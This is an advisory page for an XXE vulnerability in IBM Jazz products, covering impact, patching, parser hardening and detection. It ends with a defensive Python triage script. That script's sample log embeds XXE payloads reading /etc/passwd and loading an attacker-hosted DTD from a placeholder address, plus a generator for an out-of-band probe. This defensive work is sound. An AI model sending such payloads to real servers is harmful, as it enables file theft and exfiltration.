CVE-2021-20502
📋 TL;DR
This XML external entity (XXE) vulnerability in IBM Jazz Foundation products allows a remote, unauthenticated attacker who can submit XML to the application to read files the server process can access, or to consume memory and cause a denial of service. It affects organizations running vulnerable versions of IBM's Jazz-based engineering and collaboration products.
💻 Affected Systems
- IBM Jazz Foundation Products
- IBM Engineering Lifecycle Management
- IBM Rational Collaborative Lifecycle Management
- IBM Rational DOORS Next
- IBM Rational Engineering Lifecycle Manager
- IBM Rational Team Concert
- IBM Rational Quality Manager
📦 What is this software?
Engineering Requirements Quality Assistant On Premises by IBM
Rational Engineering Lifecycle Manager by IBM
⚠️ Risk & Real-World Impact
Worst Case
Disclosure of files readable by the Jazz server process, including configuration files and stored credentials that can then be reused against the application, its database, or other systems; or sustained service disruption through memory exhaustion from entity expansion.
Likely Case
Information disclosure of server files, potentially exposing configuration data, credentials, or other sensitive information stored on the affected system.
If Mitigated
Limited impact where the interim fix is applied, or where untrusted networks cannot reach XML-accepting endpoints and the server cannot make outbound connections. Note that egress filtering blocks out-of-band exfiltration via an attacker-hosted DTD, but not in-band disclosure where the expanded entity is echoed back in a response; the residual risk is then mainly minor service disruption.
🎯 Exploit Status
XXE is a well-understood bug class; standard payloads (a DOCTYPE declaring a SYSTEM entity, or an out-of-band parameter entity that loads an attacker-hosted DTD) apply once an endpoint that parses XML is found. No authentication is required for exploitation.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Version 7.0.2 IF2 and later
Vendor Advisory: https://www.ibm.com/support/pages/node/6437579
Restart Required: Yes
Instructions:
1. Download the interim fix from IBM Fix Central.
2. Stop the Jazz application server.
3. Apply the fix according to IBM's installation instructions.
4. Restart the application server.
5. Verify the fix is applied correctly.
🔧 Temporary Workarounds
Disable XML External Entity Processing
Configure XML parsers to disable external entity resolution. These settings apply only to parsers in code you control (custom Jazz extensions, integrations, and clients that parse Jazz output); the parser inside the IBM product is fixed only by the vendor interim fix.
Set javax.xml.XMLConstants.FEATURE_SECURE_PROCESSING to true. Treat this as a baseline rather than the whole fix: its main effect is to enforce entity-expansion limits, and whether it also blocks external entities depends on the JDK and parser in use.
Set http://apache.org/xml/features/disallow-doctype-decl to true, which rejects any DOCTYPE and therefore every entity declaration. If DOCTYPEs must be accepted, instead set http://xml.org/sax/features/external-general-entities and http://xml.org/sax/features/external-parameter-entities to false, and http://apache.org/xml/features/nonvalidating/load-external-dtd to false.
Input Validation and Filtering
Reject XML that contains a DOCTYPE declaration before it reaches the parser; that is what keeps external entity and parameter entity declarations out.
Do not rely on XML schema validation to stop XXE: DTD and entity processing happens during parsing, before the schema is checked.
An allow-list of permitted XML elements is reasonable defence in depth, but only in addition to rejecting DOCTYPEs.
🧯 If You Can't Patch
- Implement network segmentation so that only trusted networks can reach the Jazz web applications
- Deploy a web application firewall (WAF) rule that blocks request bodies containing <!DOCTYPE on XML-accepting endpoints; entities cannot be declared without one
- Restrict outbound connections from the Jazz server to the hosts it needs; this defeats out-of-band (blind) XXE, which depends on the parser fetching an attacker-hosted DTD, though not in-band file reads that are echoed in a response
🔍 How to Verify
Check if Vulnerable:
Check the installed version of each Jazz product. Versions from 6.0.6 through 7.0.2 are vulnerable unless interim fix 7.0.2 IF2 (or a later fix) has been applied.
Check Version:
Check the Jazz application's About page or version.txt file in the installation directory
Verify Fix Applied:
Verify that the installed version is 7.0.2 IF2 or later. To test behaviour rather than a version string, send a test instance a payload whose only effect is an out-of-band fetch (a parameter entity whose SYSTEM identifier points at an HTTP listener you control) to an endpoint that accepts XML; a callback to the listener means external entities are still being resolved.
📡 Detection & Monitoring
Log Indicators:
- XML parsing errors that mention DOCTYPE, entity declarations, or unresolvable URIs
- Many or unusually large XML request bodies from a single client in a short period
- Requests whose XML carries a DOCTYPE declaration, particularly one with SYSTEM or PUBLIC identifiers or parameter entities (%name;)
- Outbound connections from the Jazz server to hosts it has no business contacting, which is what the parser does when it fetches an attacker-hosted DTD
Network Indicators:
- HTTP requests containing XML with external entity references
- Unexpected outbound HTTP, FTP, or DNS traffic from the Jazz server, especially shortly after an inbound XML request
SIEM Query:
source="jazz_logs" AND ("<!DOCTYPE" OR "<!ENTITY") AND ("SYSTEM" OR "PUBLIC") AND NOT "expected_xml_pattern"
A query on the bare words "ENTITY" or "SYSTEM" matches ordinary content (the word "system" turns up in work-item text, and most SIEM string searches are case-insensitive); anchoring on the "<!DOCTYPE" and "<!ENTITY" markup keeps the hit list reviewable. Replace "expected_xml_pattern" with whatever legitimate DOCTYPE your integrations send.
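The DOCTYPE triage that both the input-filter workaround above and this SIEM query describe, as an added Python example that is not part of the advisory or of IBM's products. It classifies an XML body by what its DOCTYPE declares (internal entity, external SYSTEM entity, parameter entity, external DTD), records the target URI as an egress indicator to hunt for in proxy and DNS logs, applies a block policy equivalent to rejecting DOCTYPEs, builds the out-of-band verification probe mentioned under How to Verify, and runs the classifier over constructed request-log lines. The log line format, the endpoint path and the addresses are assumptions for the demo; Jazz does not necessarily log request bodies, so feed it whatever WAF or proxy capture you have.

```python
# Added example for this advisory page, not IBM code: text-level XXE triage of XML
# request bodies, an input-filter policy, and a scan over constructed log lines.
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Least to most suspicious; verdicts are compared by position in this list.
SEVERITY = ["clean", "doctype", "internal-entity",
            "external-entity", "parameter-entity", "external-dtd"]

# <!DOCTYPE name [external-id] [ internal-subset ]>
DOCTYPE_RE = re.compile(
    r"<!DOCTYPE\s+(?P<name>[^\s\[>]+)(?P<ext>[^\[>]*)(?:\[(?P<subset>.*?)\])?\s*>",
    re.DOTALL | re.IGNORECASE)
# <!ENTITY [%] name body>; '%' marks a parameter entity (the blind/OOB primitive).
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<pe>%\s*)?(?P<name>[^\s>]+)\s+(?P<body>[^>]*)>", re.IGNORECASE)
# SYSTEM "uri" or PUBLIC "pubid" "uri" (single quotes are normalised to double first).
URI_RE = re.compile(r'(?:SYSTEM|PUBLIC\s+"[^"]*")\s+"(?P<uri>[^"]*)"', re.IGNORECASE)

@dataclass
class Verdict:
    category: str        # one of SEVERITY
    uri: Optional[str]   # first external target named by a declaration, if any
    entity_count: int    # entity declarations found in the internal subset

def classify_xml(body: str) -> Verdict:
    """Triage one XML document by what its DOCTYPE declares; resolves nothing."""
    m = DOCTYPE_RE.search(body)
    if not m:
        return Verdict("clean", None, 0)
    worst, uri = "doctype", None
    hit = URI_RE.search((m.group("ext") or "").replace("'", '"'))
    if hit:                                   # external DTD on the DOCTYPE itself
        worst, uri = "external-dtd", hit.group("uri")
    decls = list(ENTITY_RE.finditer((m.group("subset") or "").replace("'", '"')))
    for em in decls:
        target = URI_RE.search(em.group("body"))
        cat = ("parameter-entity" if em.group("pe")
               else "external-entity" if target else "internal-entity")
        if SEVERITY.index(cat) > SEVERITY.index(worst):
            worst = cat
        if target and uri is None:
            uri = target.group("uri")
    return Verdict(worst, uri, len(decls))

def should_block(body: str, allow_internal_entities: bool = False) -> bool:
    """Input-filter policy: reject any DOCTYPE (what disallow-doctype-decl does in
    the parser), optionally tolerating internal-only entity declarations."""
    v = classify_xml(body)
    if v.category == "clean":
        return False
    if allow_internal_entities and v.category in ("doctype", "internal-entity"):
        return False
    return True

def oob_probe(callback_url: str) -> str:
    """Verification payload for a test instance you own: it reads no files and
    only makes the parser fetch callback_url if external entities still resolve."""
    return (f'<?xml version="1.0"?><!DOCTYPE p [<!ENTITY % d SYSTEM '
            f'"{callback_url}"> %d;]><p/>')

# Constructed log format (assumption): "<ts> <client> <method> <path> <status> body=<xml>".
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<path>\S+) "
                    r"(?P<status>\d{3}) body=(?P<body>.*)$", re.DOTALL)

def scan_log(lines: Iterable[str], min_category: str = "external-entity") -> List[dict]:
    """One hit per request whose body is at least min_category suspicious."""
    threshold, hits = SEVERITY.index(min_category), []
    for line in lines:
        lm = LOG_RE.match(line)
        if not lm:
            continue
        v = classify_xml(lm.group("body"))
        if SEVERITY.index(v.category) >= threshold:
            hits.append({"ts": lm.group("ts"), "client": lm.group("client"),
                         "path": lm.group("path"), "category": v.category,
                         "uri": v.uri, "entities": v.entity_count})
    return hits

# Constructed sample (placeholder path and addresses): two benign requests that both
# contain the word "system", three XXE patterns, and one line in another format.
SAMPLE_LOG = [
    '2021-03-02T10:15:01Z 198.51.100.20 POST /jazz/example-xml-endpoint 200 '
    'body=<?xml version="1.0"?><item><summary>System outage ticket</summary></item>',
    '2021-03-02T10:15:07Z 198.51.100.20 POST /jazz/example-xml-endpoint 200 '
    'body=<!DOCTYPE item [<!ENTITY co "Example Corp">]><item>&co; system</item>',
    '2021-03-02T10:16:30Z 203.0.113.7 POST /jazz/example-xml-endpoint 200 '
    'body=<?xml version="1.0"?><!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]><r>&x;</r>',
    '2021-03-02T10:16:41Z 203.0.113.7 POST /jazz/example-xml-endpoint 500 '
    'body=<!DOCTYPE r [<!ENTITY % dtd SYSTEM "http://203.0.113.9/evil.dtd"> %dtd;]><r/>',
    '2021-03-02T10:17:02Z 203.0.113.7 POST /jazz/example-xml-endpoint 500 '
    "body=<!DOCTYPE r SYSTEM 'http://203.0.113.9/x.dtd'><r/>",
    "not a request line",
]

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(h)
```

Running it prints the three hits from 203.0.113.7 with their target URIs; the two benign lines are ignored at the default threshold even though a bare substring search for SYSTEM would have flagged both. The classifier works on text and never parses or resolves anything, so it is safe to run over captured traffic, but it is a triage heuristic that encoding tricks can evade: it belongs beside the interim fix, not in place of it.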